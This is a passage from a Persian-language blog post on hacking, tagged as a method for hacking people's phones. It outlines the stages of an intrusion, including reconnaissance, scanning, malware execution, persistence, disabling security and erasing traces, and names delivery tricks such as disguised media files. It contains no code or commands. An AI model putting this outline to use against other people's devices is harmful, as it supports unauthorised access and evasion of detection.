ﺍﻣﺘﺤﺎﻥ ﺷﺪﻩ ﻫﺴﺘﻨﺪ ﭘﺲ ﺳﻌﯽ ﮐﻨﯿﺪ ﺣﺘﺎﻟﻤﻘﺪﻭﺭ ﺩﺭ ﻣﻮﺭﺩ ﮔﻮﺷﯽ ﻫﻬﺎﯼ ﺍﺭﺯﺍﻥ ﻗﯿﻤﺖ ﺍﻣﺘﺤﺎﻥ ﮐﻨﯿﻦ ﮐﻪ ﺿﺮﺭ ﻣﺎﻟﯽ ﺯﯾﺎﺩﯼ ﮔﺮﯾﺒﺎﻥ ﮔﯿﺮ ﺷﻤﺎ ﻧﺸﻮﺩ

برچسب: روش هک کردن موبایل افراد,ساشا پایدار, نویسنده: SASHA PAYDAR تاريخ: چهارشنبه 11 شهريور 1394 ساعت: 7:36

ﺟﻬﺖ ﺭﺍﺣﺘﯽ ﮐﺎﺭﺑﺮﺍﻥ ، " ﻫﮏ " ﺑﻪ ﻋﻨﻮﺍﻥ ﯾﮏ ﺭﻭﺵ ﻧﻔﻮﺫ ﻣﻨﻔﯽ ﻭ ﻣﺨﺮﺏ ﻓﺮﺽ ﺷﺪﻩ ﻭ " ﻫﮑﺮ" ﯾﮏ ﻧﻔﻮﺫﮔﺮ ﻣﺨﺮﺏ ﺩﺭ ﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﯽ ﺷﻮﺩ . ﺩﺭ ﯾﮏ ﻋﻤﻠﯿﺎﺕ ﻧﻔﻮﺫ ﭼﻨﺪ ﻧﮑﺘﻪ ﺑﺎﯾﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﯿﺮﺩ . ﺍﻭﻟﯿﻦ ﻣﻮﺭﺩ ﻧﻔﻮﺫﮔﺮ ﯾﺎ ﻫﮑﺮ ﺍﺳﺖ . ﻣﻮﺭﺩ ﺩﻭﻡ ﺭﻭﺷﯽ ﺍﺳﺖ ﮐﻪ ﺍﯾﻦ ﻧﻔﻮﺫﮔﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽ ﮐﻨﺪ ، ﮐﻪ ﻣﻤﮑﻦ ﺍﺳﺖ ﺷﺎﻣﻞ ﺭﻭﺵ ﻫﺎﯼ ﻣﺴﺘﻘﯿﻢ ﻭ ﯾﺎ ﻏﯿﺮ ﻣﺴﺘﻘﯿﻢ ﺑﺎﺷﺪ . ﻭ ﻣﻮﺭﺩ ﺳﻮﻡ ﻗﺮﺑﺎﻧﯽ ( Victim ) ﯾﺎ ﻫﺪﻑ ﺍﺳﺖ . ﺩﺭ ﻣﻮﺭﺩ ﻧﻔﻮﺫﮔﺮ ﯾﺎ ﻫﮑﺮ ﺩﺭ ﺑﺨﺶ ﻗﺒﻞ ﺍﻃﻼﻋﺎﺗﯽ ﺍﺭﺍﺋﻪ ﺷﺪ . ﻗﺮﺑﺎﻧﯽ ( Victim ) ﯾﺎ ﻫﺪﻑ : ﻫﺮ ﮐﺎﻣﭙﯿﻮﺗﺮﯼ ﮐﻪ ﺑﺪﻭﻥ ﺩﺭ ﻧﻈﺮ ﮔﺮﻓﺘﻦ ﺍﻣﮑﺎﻧﺎﺕ ﺣﻔﺎﻇﺘﯽ ﻭ ﺑﺪﻭﻥ ﺗﺪﺍﺑﯿﺮ ﺍﻣﻨﯿﺘﯽ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﯽ ﮔﯿﺮﺩ ، ﺑﻪ ﻭﯾﮋﻩ ﮐﺎﻣﭙﯿﻮﺗﺮﯼ ﮐﻪ ﺑﻪ ﺍﯾﻨﺘﺮﻧﺖ ﻭ ﯾﺎ ﺷﺒﮑﻪ ﻣﺘﺼﻞ ﺍﺳﺖ ، ﻣﯽ ﺗﻮﺍﻧﺪ ﯾﮏ ﻫﺪﻑ ﺑﺎﻟﻘﻮﻩ ﻭ ﺁﺳﺎﻥ ﺑﺎﺷﺪ . ﺑﺎﯾﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺖ ﮐﻪ ﺣﺘﯽ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺎﯾﯽ ﺑﺎ ﺗﺪﺍﺑﯿﺮ ﺍﻣﻨﯿﺘﯽ ﻧﯿﺰ ﻣﻤﮑﻦ ﺍﺳﺖ ﻫﺪﻑ ﺣﻤﻠﻪ ﯾﮏ ﻫﮑﺮ ﺑﺎﺷﻨﺪ ، ﻭﻟﯽ ﻫﺪﻓﯽ ﮐﻪ ﺩﺳﺘﺮﺳﯽ ﺑﻪ ﺁﻥ ﯾﺎ ﻏﯿﺮ ﻣﻤﮑﻦ ﺍﺳﺖ ﻭ ﯾﺎ ﺑﺴﯿﺎﺭ ﺩﺷﻮﺍﺭ . ﺩﺭ ﻣﺠﻤﻮﻉ " ﻫﺪﻑ " ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺳﯿﺴﺘﻢ ﮐﺎﻣﭙﯿﻮﺗﺮﯼ ﮐﻪ ﻫﮑﺮ ﺑﺎ ﻫﺮ ﺍﻧﮕﯿﺰﻩ ﺍﯼ ، ﻗﺼﺪ ﺩﺳﺘﺮﺳﯽ ﺑﻪ ﺁﻥ ﺭﺍ ﺩﺍﺭﺩ . ﺍﯾﻦ ﺍﻧﮕﯿﺰﻩ ﻣﻤﮑﻦ ﺍﺳﺖ ﺷﺨﺼﯽ ، ﻣﺎﻟﯽ ، ﺳﯿﺎﺳﯽ ، ﺗﺮﻭﺭﯾﺴﺘﯽ ، ﻭ ﯾﺎ ﻫﺮ ﻣﻮﺭﺩ ﺩﯾﮕﺮﯼ ﺑﺎﺷﺪ . ﻭ ﺣﺎﻝ ﺑﻪ ﺑﺮﺭﺳﯽ ﺭﻭﺵ ﻫﺎﯼ ﻧﻔﻮﺫ ﻣﯽ ﭘﺮﺩﺍﺯﯾﻢ . ▪ ﯾﮏ ﻧﻔﻮﺫ ﻣﻮﻓﻖ ﺷﺎﻣﻞ ﺍﯾﻦ ﻣﺮﺍﺣﻞ ﺍﺳﺖ : ۱ ) ﮐﺴﺐ ﺍﻃﻼﻋﺎﺕ : ﻧﻔﻮﺫﮔﺮ ﺳﻌﯽ ﻣﯽ ﮐﻨﺪ ﻗﺮﺑﺎﻧﯽ ﻭ ﺍﻣﮑﺎﻧﺎﺕ ﺁﻥ ﺭﺍ ﺑﻬﺘﺮ ﺑﺸﻨﺎﺳﺪ . ﺑﻪ ﺍﯾﻦ ﻣﻨﻈﻮﺭ ﻣﻤﮑﻦ ﺍﺳﺖ ﺳﻌﯽ ﮐﻨﺪ ﺩﺭ ﻣﺤﯿﻂ ﺍﯾﻨﺘﺮﻧﺖ ﻭ ﯾﺎ ﺧﺎﺭﺝ ﺍﺯ ﺁﻥ ﺑﺎ ﻗﺮﺑﺎﻧﯽ ﺑﯿﺸﺘﺮ ﺁﺷﻨﺎ ﺷﻮﺩ ﻭ ﻣﻤﮑﻦ ﺍﺳﺖ ﺳﻌﯽ ﮐﻨﺪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻭﯼ ﻧﺰﺩﯾﮏ ﺗﺮ ﻧﻤﺎﯾﺪ . ﺑﻪ ﺍﯾﻦ ﻃﺮﯾﻖ ﻭ ﯾﺎ ﺑﻪ ﻃﺮﻕ ﺩﯾﮕﺮ ﻭﯼ ﻣﯽ ﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺮﺑﺎﻧﯽ ، ﮐﺎﻣﭙﯿﻮﺗﺮ ﺍﻭ ، ﻣﯿﺰﺍﻥ ﺍﻣﻨﯿﺖ ﺁﻥ ﻭ ﺑﻬﺘﺮﯾﻦ ﺭﻭﺵ ﻫﺎﯼ ﻧﻔﻮﺫ ﺑﻪ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﮐﺴﺐ ﮐﻨﺪ . ﺑﺎﯾﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﯿﺪ ﮐﻪ ﺍﯾﻦ ﻣﺮﺣﻠﻪ ﺑﺴﯿﺎﺭ ﻣﻬﻤﯽ ﺍﺳﺖ ﻭ ﺑﺎﻋﺚ ﻣﯽ ﺷﻮﺩ ﻫﮑﺮ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺩﺳﺖ ﺁﻣﺪﻩ ﺷﯿﻮﻩ ﻫﺎﯼ ﮐﺎﺭﺁﻣﺪ ﻧﻔﻮﺫ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﯽ ﻗﺮﺍﺭ ﺩﻫﺪ . ﭼﻨﺎﻧﭽﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺪﻭﻥ ﮐﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺍﻗﺪﺍﻡ ﺑﻪ ﺗﻬﺎﺟﻢ ﻧﻤﺎﯾﺪ ، ﺩﺭ ﻭﺍﻗﻊ ﺑﻪ ﯾﮏ ﺣﻤﻠﻪ ﮐﻮﺭ ﺩﺳﺖ ﺯﺩﻩ . ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﻭ ﻧﻘﺎﻁ ﻗﻮﺕ ﺑﯽ ﺍﻃﻼﻉ ﺍﺳﺖ ﻭ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ ﻃﺮﯾﻖ ﺁﺯﻣﺎﯾﺶ ﻭ ﺧﻄﺎ ﮐﺎﺭﺁﻣﺪ ﺗﺮﯾﻦ ﺷﯿﻮﻩ ﻧﻔﻮﺫ ﺭﺍ ﺑﯿﺎﺑﺪ . ﺑﺎ ﺍﯾﻦ ﻫﻤﻪ ، ﺩﺭ ﺑﺴﯿﺎﺭﯼ ﺍﺯ ﻣﻮﺍﺭﺩ ﻧﻔﻮﺫﮔﺮ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﻪ ﻫﺮ ﺩﻟﯿﻠﯽ ﺗﻮﺍﻧﺎﯾﯽ ﮐﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ . ﺩﺭ ﺍﯾﻦ ﺻﻮﺭﺕ ﺗﻨﻬﺎ ﺭﺍﻩ ﭘﯿﺶ ﺭﻭﯼ ﻭﯼ ﻫﻤﺎﻥ ﺭﻭﺵ ﺁﺯﻣﺎﯾﺶ ﻭ ﺧﻄﺎ ﻣﯽ ﺑﺎﺷﺪ . ﺍﮔﺮ ﻣﻬﺎﺭﺕ ﻭ ﺷﺎﻧﺲ ﺧﻮﺑﯽ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ، ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺴﯿﺎﺭ ﺯﻭﺩ ﺩﺭﻫﺎﯾﯽ ﺑﺮﺍﯼ ﻭﺭﻭﺩ ﺑﯿﺎﺑﺪ . ۲ ) ﺍﺳﮑﻦ ﺩﺭ ﺍﯾﻦ ﻣﺮﺣﻠﻪ ﻧﻔﻮﺫﮔﺮ ﺭﻭﺵ ﻫﺎﯼ ﺍﺣﺘﻤﺎﻟﯽ ﻧﻔﻮﺫ ﺑﻪ ﺳﯿﺴﺘﻢ ﺭﺍ ﺑﺮﺭﺳﯽ ﻣﯽ ﮐﻨﺪ ﻭ ﺑﺮ ﺣﺴﺐ ﻧﺘﺎﯾﺠﯽ ﮐﻪ ﺑﻪ ﺩﺳﺖ ﻣﯽ ﺁﻭﺭﺩ ﻣﻮﺛﺮ ﺗﺮﯾﻦ ﺭﻭﺵ ﺭﺍ ﺑﺮ ﻣﯽ ﮔﺰﯾﻨﺪ . ﻫﻤﺎﻧﻄﻮﺭ ﮐﻪ ﻗﺒﻼ ﺫﮐﺮ ﺷﺪ ﭼﻨﺎﻧﭽﻪ ﻧﻔﻮﺫﮔﺮ ﻣﻮﻓﻖ ﺑﻪ ﮐﺴﺐ ﺍﻃﻼﻋﺎﺕ ﻧﺸﻮﺩ ﺍﺯ ﻃﺮﯾﻖ ﺁﺯﻣﺎﯾﺶ ﻭ ﺧﻄﺎ ﺳﻌﯽ ﺩﺭ ﯾﺎﻓﺘﻦ ﺭﺍﻩ ﻫﺎﯼ ﻭﺭﻭﺩ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ . ﺩﺭ ﺻﻮﺭﺗﯽ ﻫﻢ ﮐﻪ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺳﺒﯽ ﺩﺭ ﺍﺧﺘﯿﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ، ﺩﺭ ﺍﯾﻦ ﻣﺮﺣﻠﻪ ﺑﻬﺘﺮﯾﻦ ﻭ ﮐﺎﺭﺁﻣﺪ ﺗﺮﯾﻦ ﺷﯿﻮﻩ ﻧﻔﻮﺫ ﺭﺍ ﭘﯽ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ . ۳ ) ﻧﻔﻮﺫ ﺑﻪ ﺳﯿﺴﺘﻢ ﻭ ﺷﺮﻭﻉ ﺣﻤﻼﺕ : ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ ﻧﻔﻮﺫﯼ ﮐﻪ ﯾﺎﻓﺘﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺑﯽ ﺭﺍ ﺑﺮ ﺭﻭﯼ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﺍﺟﺮﺍ ﻣﯽ ﮐﻨﺪ ﻭ ﺑﻪ ﺷﺮﻭﻉ ﺣﻤﻼﺕ ﻣﯽ ﭘﺮﺩﺍﺯﺩ . ( ﺟﻬﺖ ﮐﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺑﺎﺭﻩ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻣﺨﺮﺏ ﺑﻪ ﺑﺨﺶ ﻣﺮﺑﻮﻃﻪ ﻣﺮﺍﺟﻌﻪ ﺷﻮﺩ ) ﺍﻟﺒﺘﻪ ﺍﯾﻦ ﺍﺣﺘﻤﺎﻝ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﻔﺮﻩ ﻫﺎﯼ ﺍﻣﻨﯿﺘﯽ ﻭ ﺳﺮﻭﯾﺲ ﻫﺎﯼ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ، ﻭ ﯾﺎ ﻫﺮ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺩﯾﮕﺮ ، ﮐﻪ ﺩﺭ ﺳﯿﺴﺘﻢ ﻫﺪﻑ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ، ﺍﻗﺪﺍﻡ ﺑﻪ ﺍﺗﺼﺎﻝ ﻧﻤﺎﯾﺪ ﻭ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻧﮑﻨﺪ . ( ﺟﻬﺖ ﺍﻃﻼﻋﺎﺕ ﺑﯿﺸﺘﺮ ﺑﻪ ﺑﺨﺶ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻫﮏ ﺭﺟﻮﻉ ﺷﻮﺩ ) ۴ ) ﺗﺜﺒﯿﺖ ﻧﻔﻮﺫ : ﻧﻔﻮﺫﮔﺮ ﺳﻌﯽ ﻣﯽ ﮐﻨﺪ ﺳﯿﺴﺘﻢ ﺍﻣﻨﯿﺘﯽ ﺍﺣﺘﻤﺎﻟﯽ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺭﺍ ﺧﻨﺜﯽ ﮐﻨﺪ ﻭ ﺑﻪ ﻧﺤﻮﯼ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﺭﺍ ﺗﻐﯿﯿﺮ ﺩﻫﺪ ﮐﻪ ﻗﺮﺑﺎﻧﯽ ﻣﺘﻮﺟﻪ ﻧﻔﻮﺫ ﻧﺸﻮﺩ ﻭ ﺑﻪ ﺭﺍﺣﺘﯽ ﻧﺘﻮﺍﻧﺪ ﺍﯾﻦ ﻧﻔﻮﺫ ﺭﺍ ﺭﻫﮕﯿﺮﯼ ﻭ ﯾﺎ ﻏﯿﺮ ﻓﻌﺎﻝ ﻧﻤﺎﯾﺪ . ﺍﻟﺒﺘﻪ ﺍﯾﻦ ﻣﺮﺣﻠﻪ ﺟﺰﻭ ﺗﻮﺍﻧﺎﯾﯽ ﻫﺎﯼ ﻫﮑﺮﻫﺎﯼ ﻣﺘﻮﺳﻂ ﺑﻪ ﺑﺎﻻ ﺍﺳﺖ ﻭ ﻫﮑﺮﻫﺎﯼ ﻣﺒﺘﺪﯼ ﭼﻨﯿﻦ ﺗﻮﺍﻧﺎﯾﯽ ﻧﺪﺍﺭﻧﺪ . ﻫﮑﺮﻫﺎﯼ ﻣﺒﺘﺪﯼ ﺩﺭ ﻭﺍﻗﻊ ﺗﺎ ﺯﻣﺎﻧﯽ ﮐﻪ ﺷﺎﻧﺲ ﺑﯿﺎﻭﺭﻧﺪ ﻭ ﮐﺎﺭﺑﺮ ﺳﯿﺴﺘﻢ ﻫﺪﻑ ﻣﺘﻮﺟﻪ ﺍﻗﺪﺍﻣﺎﺕ ﺁﻧﻬﺎ ﻧﺸﻮﺩ ﻭ ﺩﺭ ﺻﺪﺩ ﺧﻨﺜﯽ ﮐﺮﺩﻥ ﺁﻥ ﺑﺮ ﻧﯿﺎﯾﺪ ، ﻧﻔﻮﺫ ﭘﺎﯾﺪﺍﺭﯼ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ . ۵ ) ﻣﺴﯿﺮ ﻫﺎﯼ ﺍﺭﺗﺒﺎﻃﯽ ﺑﺎ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺭﺍ ﺑﺮﺭﺳﯽ ﺧﻮﺍﻫﺪ ﮐﺮﺩ ﺗﺎ ﺍﮔﺮ ﻣﺴﯿﺮ ﺍﻭﻟﯿﻪ ﺑﻪ ﻫﺮ ﺩﻟﯿﻠﯽ ﺍﺯ ﺑﯿﻦ ﺭﻓﺖ ﻧﻔﻮﺫ ﻭﯼ ﺗﺜﺒﯿﺖ ﺷﺪﻩ ﺑﺎﻗﯽ ﺑﻤﺎﻧﺪ . ﺍﯾﻦ ﻣﺮﺣﻠﻪ ﻧﯿﺰ ﺟﺰﻭ ﺗﻮﺍﻧﺎﯾﯽ ﻫﺎﯼ ﻫﮑﺮ ﻫﺎﯼ ﻣﺘﻮﺳﻂ ﺑﻪ ﺑﺎﻻ ﻣﯽ ﺑﺎﺷﺪ . ﯾﮏ ﻫﮑﺮ ﭘﯿﺸﺮﻓﺘﻪ ، ﻫﻤﯿﺸﻪ ﺍﯾﻦ ﺍﺣﺘﻤﺎﻝ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﻣﯽ ﮔﯿﺮﺩ ﮐﻪ ﺭﻭﺵ ﻧﻔﻮﺫﯼ ﻭﯼ ﮐﺸﻒ ﻭ ﯾﺎ ﺧﻨﺜﯽ ﺷﻮﺩ . ﺑﻪ ﻫﻤﯿﻦ ﺩﻟﯿﻞ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻣﺨﺮﺏ ﻭ ﯾﺎ ﺗﻐﯿﯿﺮﺍﺗﯽ ﮐﻪ ﺩﺭ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﺍﯾﺠﺎﺩ ﻣﯽ ﮐﻨﺪ ، ﺩﺭﻫﺎﯼ ﺑﯿﺸﺘﺮﯼ ﺭﺍ ﺑﺮ ﺭﻭﯼ ﺧﻮﺩ ﺧﻮﺍﻫﺪ ﮔﺸﻮﺩ . ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭘﺲ ﺍﺯ ﺗﺜﺒﯿﺖ ﻧﻔﻮﺫ ﻣﯽ ﺗﻮﺍﻧﺪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻣﺨﺮﺏ ﺑﯿﺸﺘﺮﯼ ﺭﺍ ﺑﺮ ﺭﻭﯼ ﺳﯿﺴﺘﻢ ﻧﺼﺐ ﻧﻤﺎﯾﺪ ﻭ ﯾﺎ ﺑﺎ ﺍﻋﻤﺎﻝ ﺗﻐﯿﯿﺮ ﺩﺭ ﺑﺮﺧﯽ ﺍﺯ ﺳﺮﻭﯾﺲ ﻫﺎﯼ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﻧﻈﯿﺮ Telnet ﺭﺍﻩ ﻫﺎﯼ ﺁﺳﺎﻥ ﺗﺮ ﻭ ﻗﺎﻧﻮﻧﯽ ﺗﺮﯼ ! ﺟﻬﺖ ﻧﻔﻮﺫ ﺩﺭ ﺍﺧﺘﯿﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ . ﺩﺭ ﻣﻮﺭﺩ ﻫﮑﺮﻫﺎﯼ ﭘﯿﺸﺮﻓﺘﻪ ﻣﺮﺣﻠﻪ ﺩﯾﮕﺮﯼ ﻧﯿﺰ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺁﻥ " ﺍﺯ ﺑﯿﻦ ﺑﺮﺩﻥ ﺭﺩ ﭘﺎ ﻫﺎ " ﺧﻮﺍﻫﺪ ﺑﻮﺩ . ﺩﺭ ﻭﺍﻗﻊ ﻧﻔﻮﺫ ﻭ ﯾﺎ ﺣﻤﻠﻪ ﺑﻪ ﯾﮏ ﺳﯿﺴﺘﻢ ﮐﺎﻣﭙﯿﻮﺗﺮﯼ ﮐﺎﺭ ﭼﻨﺪﺍﻥ ﺩﺷﻮﺍﺭﯼ ﻧﯿﺴﺖ . ﻣﺴﺎﻟﻪ ﻣﻬﻢ ﺍﺯ ﺑﯿﻦ ﺑﺮﺩﻥ ﺭﺩ ﭘﺎﻫﺎ ﻭ ﺑﻪ ﺩﺍﻡ ﻧﯿﻔﺘﺎﺩﻥ ﺍﺳﺖ ﮐﻪ ﻓﻘﻂ ﺩﺭ ﺗﺨﺼﺺ ﻫﮑﺮﻫﺎﯼ ﺣﺮﻓﻪ ﺍﯼ ﻣﯽ ﺑﺎﺷﺪ . ﺭﻭﺵ ﻫﺎﯼ ﻓﺮﺍﻭﺍﻧﯽ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﻣﯽ ﺗﻮﺍﻥ ﺍﺯ ﻃﺮﯾﻖ ﺁﻧﻬﺎ ﻫﮑﺮﻫﺎﯾﯽ ﺭﺍ ﮐﻪ ﺭﺩﭘﺎﯼ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺑﯿﻦ ﻧﺒﺮﺩﻩ ﺍﻧﺪ ﺑﻪ ﺩﺍﻡ ﺍﻧﺪﺍﺧﺖ . ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﯿﺪ ﮐﻪ ﺩﺭ ﺍﺧﺘﯿﺎﺭ ﮔﺮﻓﺘﻦ ﮐﻨﺘﺮﻝ ﯾﮏ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻭ ﯾﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺩﺭ ﺻﻮﺭﺗﯽ ﻣﻤﮑﻦ ﺧﻮﺍﻫﺪ ﺷﺪ ﮐﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺘﻮﺍﻧﺪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺑﯽ ﺭﺍ ﺑﺮ ﺭﻭﯼ ﺁﻥ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﺩ ﻭ ﯾﺎ ﺍﺯ ﻃﺮﯾﻖ ﻧﻘﺎﻁ ﺿﻌﻒ ﺗﺮﻣﯿﻢ ﻧﺸﺪﻩ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﺁﻥ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﻮﺩ . ﺑﻪ ﻫﻤﯿﻦ ﺩﻟﯿﻞ ، ﺍﺯ ﺍﻓﺮﺍﺩ ﯾﺎﻭﻩ ﮔﻮﯾﯽ ﮐﻪ ﺷﻤﺎ ﺭﺍ ﺗﻬﺪﯾﺪ ﺑﻪ ﻫﮏ ﻣﯽ ﮐﻨﻨﺪ ﻫﺮﺍﺱ ﺯﯾﺎﺩﯼ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﯿﺪ ﺯﯾﺮﺍ ﺍﯾﻦ ﺍﻓﺮﺍﺩ ﻧﻤﯽ ﺗﻮﺍﻧﻨﺪ ﺑﺪﻭﻥ ﺩﺍﺷﺘﻦ ﻫﯿﭻ ﭘﺎﯾﮕﺎﻫﯽ ﺩﺭ ﮐﺎﻣﭙﯿﻮﺗﺮ ﯾﺎ ﺷﺒﮑﻪ ﺷﻤﺎ ﺍﻗﺪﺍﻡ ﺑﻪ ﻧﻔﻮﺫ ﺩﺭ ﺁﻥ ﮐﻨﻨﺪ . ﺧﻄﺮ ﻭﺍﻗﻌﯽ ﺍﺯ ﺯﻣﺎﻧﯽ ﺁﻏﺎﺯ ﻣﯽ ﺷﻮﺩ ﮐﻪ ﺍﯾﻦ ﺍﻓﺮﺍﺩ ﺳﻌﯽ ﻣﯽ ﮐﻨﻨﺪ ﺍﯾﻦ ﭘﺎﯾﮕﺎﻩ ﺭﺍ ﺍﯾﺠﺎﺩ ﮐﻨﻨﺪ ﻭ ﯾﺎ ﻣﻮﻓﻖ ﺑﻪ ﺍﯾﺠﺎﺩ ﺁﻥ ﻣﯽ ﺷﻮﻧﺪ . ﺑﻨﺎﺑﺮﺍﯾﻦ ﺭﻭﺵ ﻧﻔﻮﺫ ﺩﺭ ﻭﺍﻗﻊ ﺭﻭﺷﯽ ﺍﺳﺖ ﺑﺮﺍﯼ ﺍﺟﺮﺍﯼ ﯾﮏ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻭ ﯾﺎ ﺩﺳﺘﺮﺳﯽ ﻏﯿﺮ ﻣﺠﺎﺯ . ﯾﮏ ﻧﻔﻮﺫﮔﺮ ﻣﻤﮑﻦ ﺍﺳﺖ ﺍﺯ ﺭﻭﺵ ﻫﺎﯼ ﻣﺴﺘﻘﯿﻢ ﯾﺎ ﻏﯿﺮ ﻣﺴﺘﻘﯿﻢ ﺑﺮﺍﯼ ﻧﻔﻮﺫ ﺑﻪ ﯾﮏ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﺪ . ▪ ﺭﻭﺵ ﻫﺎﯼ ﺣﻤﻠﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﯽ ﺗﻮﺍﻧﻨﺪ ﺍﯾﻨﮕﻮﻧﻪ ﺑﺎﺷﻨﺪ : - ﻣﻬﺎﺟﻢ ﺳﻌﯽ ﻣﯽ ﮐﻨﺪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺭﺍ ﺑﺮﺍﯼ ﺷﻤﺎ ﺑﻔﺮﺳﺘﺪ ﺗﺎ ﺧﻮﺩﺗﺎﻥ ﺁﻥ ﺭﺍ ﺍﺟﺮﺍ ﻧﻤﺎﯾﯿﺪ . ﺩﺭ ﺍﯾﻦ ﮐﺎﺭ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺴﯿﺎﺭ ﻧﺎﺷﯿﺎﻧﻪ ﻋﻤﻞ ﻧﻤﺎﯾﺪ ﻭ ﺷﻤﺎ ﺍﺯ ﻫﺪﻑ ﻭﯼ ﻣﻄﻠﻊ ﺷﻮﯾﺪ ﻭ ﯾﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺴﯿﺎﺭ ﻣﺎﻫﺮﺍﻧﻪ ﻋﻤﻞ ﮐﻨﺪ . - ﻣﻬﺎﺟﻢ ﻣﻤﮑﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﯾﻦ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻓﺮﯾﺐ ﺩﻫﺪ ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﮑﻦ ﺍﺳﺖ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﯾﮏ ﻓﺎﯾﻞ ﺗﺼﻮﯾﺮﯼ ﯾﺎ ﻣﻮﺳﯿﻘﯽ ﺩﺭ ﺍﺧﺘﯿﺎﺭ ﺷﻤﺎ ﻗﺮﺍﺭ ﺩﻫﺪ . - ﻣﻤﮑﻦ ﺍﺳﺖ ﻧﻔﻮﺫﮔﺮ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺩﯾﺪﻥ ﯾﮏ ﺻﻔﺤﻪ ﺍﯾﻨﺘﺮﻧﺘﯽ ﺁﻟﻮﺩﻩ ﺗﺸﻮﯾﻖ 